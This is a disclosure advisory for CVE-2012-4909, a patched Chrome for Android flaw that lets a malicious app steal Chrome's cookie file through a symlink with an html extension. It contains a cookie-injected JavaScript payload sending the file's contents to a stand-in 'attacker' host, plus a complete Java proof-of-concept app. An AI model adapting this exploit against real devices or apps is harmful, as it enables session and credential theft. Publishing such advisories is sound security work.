CVE Number:         CVE-2012-4909
Title:              Chrome for Android - Cookie theft from Chrome by malicious Android app
Affected Software:  Confirmed on Chrome for Android v18.0.1025123
Credit:             Takeshi Terada
Issue Status:       v18.0.1025308 was released which fixes this vulnerability

Overview:
  Symbolic links can be used for spoofing Content-Type of local files.
  It enables malicious Android apps to steal Chrome's Cookie file.

Details:
  When a local URI (file:///) of symlink is given to Chrome for Android
  (v18.0.1025123), Chrome resolves symlink and load the content of the file
  that the symlink is pointing to.

  At the time of loading, Chrome does MIME sniffing by the extension of the
  symlink, rather than that of the actual file which symlink is pointing to.

  This behavior can be used for deluding Chrome into thinking that the Chrome's
  private file (Cookie file) is HTML. When Chrome renders the Cookie file as HTML,
  JavaScript in the Cookie file is executed.

  Whole steps to steal Chrome's Cookie file are described below:

  1. A malicious app create a symlink pointing to Chrome's Cookie file. The
     extension of the symlink should be "html", which is a simple trick for
     spoofing Content-Type.

  2. The malicious app forces Chrome to load attacker's Web page. The Web page
     sets a crafted Cookie which contains malicious HTML+JavaScript to steal
     the whole content of the Cookie file:

     Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?'
                   +encodeURIComponent(document.body.innerHTML)</script>;
                   expires=Tue, 01-Jan-2030 00:00:00 GMT

     The Cookie is stored in the Cookie file of Chrome.

  3. The malicious app makes Chrome load the local URI of the symlink.
     Then Chrome follows the symlink and renders the Cookie file as HTML,
     because the extension of the URI (symlink) is "html".

     It results in the execution of the attacker's JavaScript code that is
     injected in the Cookie file. Attacker-supplied JavaScript read the whole
     content of the Cookie file and send it to the attacker's server.

Proof of Concept:
  package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.util.Log;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
    // TAG for logging.
    public final static String TAG = "attackchrome1";
  
    // Cookie file path of Chrome.
    public final static String CHROME_COOKIE_FILE_PATH =
      "/data/data/com.android.chrome/app_chrome/Default/Cookies";
  
    // Temporaly directory in which the symlink will be created.
    public final static String MY_TMP_DIR =
      "/data/data/jp.mbsd.terada.attackchrome1/tmp/";
  
    // The path of the Symlink (must have "html" extension)
    public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";
  
    @Override
    public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      doit();
    }
  
    // Method to invoke Chrome.
    public void invokeChrome(String url) {
      Intent intent = new Intent("android.intent.action.VIEW");
      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
      intent.setData(Uri.parse(url));
      startActivity(intent);
    }
  
    // Method to execute OS command.
    public void cmdexec(String[] cmd) {
      try {
        Runtime.getRuntime().exec(cmd);
      }
      catch (Exception e) {
        Log.e(TAG, e.getMessage());
      }
    }
  
    // Main method.
    public void doit() {
      try {
        // Create the symlink in this app's temporary directory.
        // The symlink points to Chrome's Cookie file.
        cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
        cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
        cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});
  
        Thread.sleep(1000);
  
        // Force Chrome to load attacker's web page to poison Chrome's Cookie file.
        // Suppose the web page sets a Cookie as below.
        //   x=<img><script>document.images[0].src='http://attacker/?'
        //     +encodeURIComponent(document.body.innerHTML)</script>;
        //     expires=Tue, 01-Jan-2030 00:00:00 GMT
        String url1 = "http://attacker/set_malicious_cookie.php";
        invokeChrome(url1);
  
        Thread.sleep(10000);
  
        // Force Chrome to load the symlink.
        // Chrome renders the content of the Cookie file as HTML.
        String url2 = "file://" + LINK_PATH;
        invokeChrome(url2);
      }
      catch (Exception e) {
        Log.e(TAG, e.getMessage());
      }
    }
  }

Timeline:
  2012/08/06  Reported to Google security team
  2012/09/12  Vender announced v18.0.1025308
  2013/01/07  Disclosure of this advisory

Recommendation:
  Upgrade to the latest version.

Reference:
  http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
  https://code.google.com/p/chromium/issues/detail?id=141889